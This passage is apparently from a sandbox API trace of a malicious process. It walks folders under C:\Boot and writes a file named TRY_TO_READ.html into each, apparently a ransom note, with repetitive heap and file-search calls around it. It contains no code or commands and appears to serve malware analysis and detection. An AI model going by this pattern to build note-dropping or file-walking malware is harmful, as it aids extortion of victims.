hHeap=0x2e0000) returned 1 [0116.442] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.442] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.442] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e238 | out: hHeap=0x2e0000) returned 1 [0116.442] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0116.442] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.442] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e238 [0116.442] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e260 [0116.442] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e288 [0116.442] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.442] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.442] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.442] CreateFileW (lpFileName="C:\\\\Boot\\fi-FI\\TRY_TO_READ.html" (normalized: "c:\\boot\\fi-fi\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.443] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.443] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.455] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.455] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.455] CloseHandle (hObject=0x3d8) returned 1 [0116.455] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.455] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.455] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.455] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e288 | out: hHeap=0x2e0000) returned 1 [0116.455] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0116.455] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.455] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e288 [0116.455] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e2b0 [0116.455] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e2d8 [0116.456] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.456] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.456] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.456] GetLastError () returned 0x0 [0116.456] SetLastError (dwErrCode=0x0) [0116.456] GetLastError () returned 0x0 [0116.456] SetLastError (dwErrCode=0x0) [0116.456] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.456] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\TRY_TO_READ.html" (normalized: "c:\\boot\\fonts\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.458] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.458] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.459] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.459] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.459] CloseHandle (hObject=0x3d8) returned 1 [0116.459] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.459] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.459] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.459] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e2d8 | out: hHeap=0x2e0000) returned 1 [0116.459] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0116.459] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.459] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.459] GetLastError () returned 0x0 [0116.459] SetLastError (dwErrCode=0x0) [0116.459] GetLastError () returned 0x0 [0116.459] SetLastError (dwErrCode=0x0) [0116.459] GetLastError () returned 0x0 [0116.459] SetLastError (dwErrCode=0x0) [0116.459] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e2d8 [0116.459] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e300 [0116.459] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e328 [0116.459] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.460] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.460] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.460] GetLastError () returned 0x0 [0116.460] SetLastError (dwErrCode=0x0) [0116.460] GetLastError () returned 0x0 [0116.460] SetLastError (dwErrCode=0x0) [0116.460] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.460] CreateFileW (lpFileName="C:\\\\Boot\\fr-FR\\TRY_TO_READ.html" (normalized: "c:\\boot\\fr-fr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.461] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.462] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.462] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.462] CloseHandle (hObject=0x3d8) returned 1 [0116.462] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.462] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.462] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.462] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e328 | out: hHeap=0x2e0000) returned 1 [0116.462] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0116.462] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.462] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.462] GetLastError () returned 0x0 [0116.462] SetLastError (dwErrCode=0x0) [0116.462] GetLastError () returned 0x0 [0116.462] SetLastError (dwErrCode=0x0) [0116.462] GetLastError () returned 0x0 [0116.462] SetLastError (dwErrCode=0x0) [0116.463] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e328 [0116.463] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e350 [0116.463] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e378 [0116.463] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.463] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.463] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.463] GetLastError () returned 0x0 [0116.463] SetLastError (dwErrCode=0x0) [0116.463] GetLastError () returned 0x0 [0116.463] SetLastError (dwErrCode=0x0) [0116.463] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.463] CreateFileW (lpFileName="C:\\\\Boot\\hu-HU\\TRY_TO_READ.html" (normalized: "c:\\boot\\hu-hu\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.463] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.463] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.464] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.464] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.464] CloseHandle (hObject=0x3d8) returned 1 [0116.465] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.465] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.465] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.465] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e378 | out: hHeap=0x2e0000) returned 1 [0116.465] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0116.465] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.465] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e378 [0116.465] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e3a0 [0116.465] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e3c8 [0116.465] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.465] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.465] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] GetLastError () returned 0x0 [0116.465] SetLastError (dwErrCode=0x0) [0116.465] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.465] CreateFileW (lpFileName="C:\\\\Boot\\it-IT\\TRY_TO_READ.html" (normalized: "c:\\boot\\it-it\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.466] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.466] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.467] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.467] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.467] CloseHandle (hObject=0x3d8) returned 1 [0116.467] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.468] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.468] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.468] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e3c8 | out: hHeap=0x2e0000) returned 1 [0116.468] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0116.468] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.468] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.468] GetLastError () returned 0x0 [0116.468] SetLastError (dwErrCode=0x0) [0116.468] GetLastError () returned 0x0 [0116.468] SetLastError (dwErrCode=0x0) [0116.468] GetLastError () returned 0x0 [0116.468] SetLastError (dwErrCode=0x0) [0116.468] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e3c8 [0116.468] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e3f0 [0116.468] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e418 [0116.468] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.468] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.468] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.468] GetLastError () returned 0x0 [0116.468] SetLastError (dwErrCode=0x0) [0116.468] GetLastError () returned 0x0 [0116.468] SetLastError (dwErrCode=0x0) [0116.468] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.468] CreateFileW (lpFileName="C:\\\\Boot\\ja-JP\\TRY_TO_READ.html" (normalized: "c:\\boot\\ja-jp\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.469] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.469] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.469] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.478] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.478] CloseHandle (hObject=0x3d8) returned 1 [0116.478] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.478] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.478] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.478] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e418 | out: hHeap=0x2e0000) returned 1 [0116.478] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0116.478] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.478] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.478] GetLastError () returned 0x0 [0116.478] SetLastError (dwErrCode=0x0) [0116.478] GetLastError () returned 0x0 [0116.478] SetLastError (dwErrCode=0x0) [0116.478] GetLastError () returned 0x0 [0116.478] SetLastError (dwErrCode=0x0) [0116.478] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e418 [0116.478] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e440 [0116.478] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e468 [0116.478] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.478] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.478] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.478] GetLastError () returned 0x0 [0116.478] SetLastError (dwErrCode=0x0) [0116.478] GetLastError () returned 0x0 [0116.479] SetLastError (dwErrCode=0x0) [0116.479] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.479] CreateFileW (lpFileName="C:\\\\Boot\\ko-KR\\TRY_TO_READ.html" (normalized: "c:\\boot\\ko-kr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.479] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.480] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.480] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.481] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.481] CloseHandle (hObject=0x3d8) returned 1 [0116.481] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.481] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.481] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.481] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e468 | out: hHeap=0x2e0000) returned 1 [0116.481] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0116.481] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.481] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.481] GetLastError () returned 0x0 [0116.481] SetLastError (dwErrCode=0x0) [0116.481] GetLastError () returned 0x0 [0116.481] SetLastError (dwErrCode=0x0) [0116.481] GetLastError () returned 0x0 [0116.481] SetLastError (dwErrCode=0x0) [0116.481] RtlAllocateHeap (HeapHandle=0x2e0000, 